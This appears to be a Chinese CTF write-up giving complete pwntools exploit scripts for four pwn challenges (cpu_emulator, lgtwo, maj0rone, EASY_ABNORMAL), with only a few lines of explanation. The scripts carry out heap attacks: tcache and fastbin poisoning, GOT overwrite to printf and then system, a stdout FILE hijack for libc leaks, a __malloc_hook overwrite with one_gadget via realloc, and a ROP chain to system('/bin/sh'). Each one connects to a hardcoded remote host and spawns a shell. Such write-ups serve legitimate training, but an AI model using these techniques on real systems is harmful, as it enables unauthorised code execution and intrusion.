cpu_emulator
通过越界写劫持tcache数组,在其0x80和0x40的位置填入free的got表和atoi函数的got表地址,申请的时候将free_got劫持为printf泄露libc,而后将atoi函数的got表劫持为system函数,从而获取shell,需要注意的是本题是更新过的2.27libc,因此若是直接劫持会crash
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'emulator'
elf = ELF('emulator')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "123.56.52.128"
port = 18236
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">> ",str(idx))
def opp(payload):
cmd(1)
sla("size:\n",len(payload))
sa("instruction:\n",payload)
def add1(size,payload):
cmd(1)
sla("size:\n",str(size))
sa("instruction:\n",payload)
def add(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x20))
def sub(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x24))
def AND(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x30))
def OR(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x34))
def XOR(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x38))
def SHIFT(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x3c))
def read(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0x8c))
def write(idx,offset):
return u32(p16(offset)+p8(idx)+p8(0xac))
"""
(0x3e00000 & a1) >> 21
(0x1f0000 & a1) >>16
(0xffff & a1)
"""
"""
reg[0] = 0xfffe0000
reg[0] = reg[0]+0xfdf0
reg[1] = 0x600000
reg[1] += reg[1]+0x2018
memory[reg[0]] = reg[1]
"""
free_got = 0x0000000000602018
payload = p32(add(0x04,0x10))+p32(add(0x05,0x20))+p32(add(0x06,0x60))
payload += p32(add(0x09,0x2))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe20))
payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
payload += p32(add(0x04,0x58-0x20))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe00))
payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfdb0))
payload += p32(write(0x09,2))+p32(write(0x09,6))
opp(payload)
#rax = opcode >> 26
#rdx = rax*4
#eax = rdx+rax
#rdx = [0x401404+rdx]
#rax = 0x401404+[0x401404+4*(opcode >> 26)]
#0x400ECD
# b *0x400971
# b *0x400A2D
cmd(2)
add1(0x78,p64(elf.plt["printf"])*2)
add1(0x68,"%9$p")
cmd(1)
ru("0x")
libc_base = int(p.recv(12),16)-231-libc.sym["__libc_start_main"]
lg("libc_base",libc_base)
sla("size:\n",str(0x38))
sa("instruction:\n",p64(libc_base+libc.sym["system"]))
# add1(0x38,p64(libc_base+libc.sym["system"]))
cmd("sh")
# gdb.attach(p,"""
# b *0x400eac
# """)
p.interactive()
lgtwo
off by one 没有show,劫持stdout泄露libc,double free劫持malloc_hook,one_gadget条件不满足,需要用libc_realloc调整栈帧
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
# context.log_level = 'debug'
binary = 'pwn2'
elf = ELF('pwn2')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "123.56.52.128"
port = 45830
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">> ",str(idx))
def add(size,payload):
cmd(1)
sla("size?\n",str(size))
sa("content?\n",payload)
def free(idx):
cmd(2)
sla("index ?\n",str(idx))
def edit(idx,payload):
cmd(4)
sla("index ?\n",str(idx))
sa("content ?\n",payload)
add(0xf8,"aaaa")#0
add(0x68,"aaaa")#1
add(0xf8,"aaaa")#2
add(0xf8,"aaaa")#3
add(0x68,"aaaa")#4
add(0xf8,"aaaa")#5
add(0x68,"aaaa")#6
free(0)
edit(1,"a"*0x60+p64(0x70+0x100)+p8(0))
free(2)
add(0xf8,"aaaa")#0
add(0x68,"aaaa")#2->1
add(0xf8,"aaaa")#7
free(0)
add(0x68,"aaaa")
add(0x68,"aaaa")#8
edit(8,p16(0x25dd))
free(0)
free(1)
edit(2,p8(0x70))
add(0x68,"aaa")#0
add(0x68,"aaa")#1
add(0x68,"aaa")#9
edit(9,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
free(4)
free(0)
edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
add(0x68,"aaaa")
add(0x68,"aaaa")
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""
edit(4,"a"*(0x13-0x8)+p64(libc_base+0x4527a)+p64(libc_base+libc.sym["__libc_realloc"]+0x8))
cmd(1)
p.recv()
p.sendline(str(0x100))
# gdb.attach(p)
p.interactive()
maj0rone
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: cnitlrt
import sys
import os
from pwn import *
# context.lo1
context.log_level = 'debug'
binary = 'maj'
elf = ELF('maj')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "123.56.52.128"
port = 18523
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
o_g = [0x45226,0x4527a,0xf0364,0xf1207]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">> ",str(idx))
def add(size,payload):
cmd(1)
sla('please answer the question\n',str(80))
sla("______?\n",str(size))
sa("yes_or_no?\n",payload)
def free(idx):
cmd(2)
sla("index ?\n",str(idx))
def show(idx):
cmd(3)
sla("index ?\n",str(idx))
def edit(idx,payload):
cmd(4)
sla("index ?\n",str(idx))
sa("__new_content ?\n",payload)
add(0x28,"0")
add(0x68,"0")
add(0x68,'0')
add(0x68,'0')
add(0x68,'0')
edit(0,p64(0)+p64(0x71))
payload = p64(0)+p64(0x21)
edit(1,payload*6)
free(2)
free(1)
edit(1,'\x10')
add(0x68,"1")
add(0x68,"1")#6
payload = p64(0)*3+p64(0x70+0x71)
edit(6,payload)
free(1)
add(0x68,"a")#7
add(0x68,"a")#8->2
edit(6,payload)
free(1)
free(2)
add(0x38,"a")#9
add(0x28,"a")#10
edit(8,p16(0x25dd))
add(0x68,"a")
add(0x68,"12")
edit(12,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
libc_base = l64()-0x3c5600
lg("libc_base",libc_base)
free(3)
edit(3,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
add(0x68,"a")
add(0x68,"14")
edit(14,"a"*0x13+p64(o_g[3]+libc_base))
cmd(1)
sla('please answer the question\n',str(80))
sla("______?\n",str(80))
# gdb.attach(p)
p.interactive()
EASY_ABNORMAL
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'
binary = 'pwn111'
elf = ELF('pwn111')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "123.56.52.128"
port = 10012
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla("E :",str(idx))
def add(payload):
cmd(2)
sla("cnt:\n",payload)
def free(idx):
cmd(3)
sla("idx:",str(idx))
def show(idx):
cmd(4)
def gift(payload):
cmd(23333)
sa("INPUT:",payload)
sla("NAME: ","%11$p")
cmd(1)
ru("0x")
libc_base = int(p.recv(12),16)-240-libc.sym["__libc_start_main"]
lg("libc_base",libc_base)
pop_rdi = libc_base + 0x21112
sys_addr = libc_base + libc.sym['system']
sh_addr = libc_base + libc.search("/bin/sh").next()
ret = libc_base + 0x0937
payload = p64(ret)*6+p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
add(payload)
add(payload)
free(0)
free(1)
show(1)
ru("2:")
heap_base = u64(ru("\n")[:-1].ljust(8,"\x00"))
lg("heap_base",heap_base)
# gdb.attach(p)
gift("a"*0x20+p64(heap_base+0x20))
p.interactive()
网友评论